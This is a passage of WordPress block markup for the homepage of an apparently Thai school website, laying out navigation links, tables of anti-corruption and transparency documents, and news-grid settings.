{\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td>คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</td></tr><tr><td>ข้อมูลเชิงสถิติการให้บริการ</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\